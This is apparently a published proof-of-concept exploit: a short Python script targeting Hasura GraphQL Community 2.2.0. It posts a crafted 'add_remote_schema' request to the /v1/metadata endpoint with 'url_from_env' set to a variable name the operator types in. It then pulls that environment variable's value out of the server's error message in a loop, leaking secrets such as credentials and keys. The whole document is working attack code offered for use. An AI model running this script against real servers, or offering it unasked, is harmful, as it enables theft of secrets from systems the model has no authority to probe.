# Exploit Title: Hasura GraphQL 2.2.0 - Information Disclosure
# Software: Hasura GraphQL Community
# Software Link: https://github.com/hasura/graphql-engine
# Version: 2.2.0
# Exploit Author: Dolev Farhi
# Date: 5/05/2022
# Tested on: Ubuntu
import requests
SERVER_ADDR = 'x.x.x.x'
url = 'http://{}/v1/metadata'.format(SERVER_ADDR)
print('Hasura GraphQL Community 2.2.0 - Arbitrary Root Environment Variables Read')
while True:
env_var = input('Type environment variable key to leak.\n> ')
if not env_var:
continue
payload = {
"type": "bulk",
"source": "",
"args": [
{
"type": "add_remote_schema",
"args": {
"name": "ttt",
"definition": {
"timeout_seconds": 60,
"forward_client_headers": False,
"headers": [],
"url_from_env": env_var
},
"comment": ""
}
}
],
"resource_version": 2
}
r = requests.post(url, json=payload)
try:
print(r.json()['error'].split('not a valid URI:')[1])
except IndexError:
print('Could not parse out VAR, dumping error as is')
print(r.json().get('error', 'N/A'))